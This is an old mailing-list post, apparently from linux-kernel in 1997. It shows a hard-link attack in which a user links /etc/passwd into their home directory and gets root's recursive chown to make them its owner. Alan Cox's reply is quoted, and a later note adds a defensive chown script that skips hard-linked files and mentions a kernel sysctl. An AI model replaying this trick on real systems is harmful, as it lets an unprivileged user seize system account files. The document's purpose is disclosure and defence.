user$ ln /etc/passwd ~/.some
user$ mail root -s "Please, help me"
change pls my uid (and mount with this uid some nfs export from other
machine)
.
...
root# chown newuser /home/user -R
...
user$ ls -l /etc/passwd
-rw-r--r-- 1 newuser root 1053 Dec 22 20:13 /etc/passwd
user$ he-he-he

This is only a common example. And this is a *serious* security bug.

On Mon, 29 Dec 1997, Alan Cox wrote:
> > >in the root partition (presumably /tmp would be a symlink to /var/tmp)
> > >would also help. I didn't see how your security hole worked until I
> > >stopped trying to think *why* root would do what you say he'd do.
> >
> > Unfortunately, files not only in the root directory may be "hacked" by users.
> > For example, there are foreign user files. They may be very important. And as
>
> If chown -R doesn't do what you want, then fix the chown command to have a flag
> for "don't chown hard linked files". It's not a kernel issue, it's either a
> user error issue and/or a "tool does the wrong thing" issue depending on your
> viewpoint
>
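
One way to get the "don't chown hard linked files" behaviour discussed above, as an added example that is not part of the original thread or of any chown implementation. The function names are hypothetical, and the demo works on a constructed scratch directory.

```shell
#!/bin/sh
# Added example: recursive chown that leaves hard-linked regular files alone.
# Function names are hypothetical; only POSIX find/chown options are used.

# Print regular files under DIR with more than one link (candidates for
# the ~/.some -> /etc/passwd link shown in the session above).
list_multilinked() {
    find "$1" -xdev -type f -links +1 -print
}

# chown_tree_skip_hardlinks OWNER DIR
# Changes directories, symlinks (the link itself, -h) and single-link regular
# files; multi-linked files are reported on stderr for manual review.
# Not race-free: a user who can still write to DIR can add a link between
# the find test and the chown call, so lock the account or tree first.
chown_tree_skip_hardlinks() {
    owner=$1
    dir=$2
    find "$dir" -xdev \( -type d -o -type l -o \( -type f -links 1 \) \) \
        -exec chown -h "$owner" {} +
    list_multilinked "$dir" | sed 's/^/skipped (hard-linked): /' >&2
}

# Constructed demo in a scratch directory; touches nothing outside it.
demo() {
    t=$(mktemp -d) || return 1
    mkdir "$t/etc" "$t/home"
    echo 'root:x:0:0::/root:/bin/sh' > "$t/etc/passwd"   # constructed sample
    echo 'notes' > "$t/home/notes"
    ln "$t/etc/passwd" "$t/home/.some"
    chown_tree_skip_hardlinks "$(id -u)" "$t/home"
    rm -rf "$t"
}

# Run the demo only when invoked as: sh script.sh demo
[ "${1:-}" != demo ] || demo
```

On current Linux kernels, setting the `fs.protected_hardlinks` sysctl to 1 blocks the `ln /etc/passwd ~/.some` step itself for an unprivileged user.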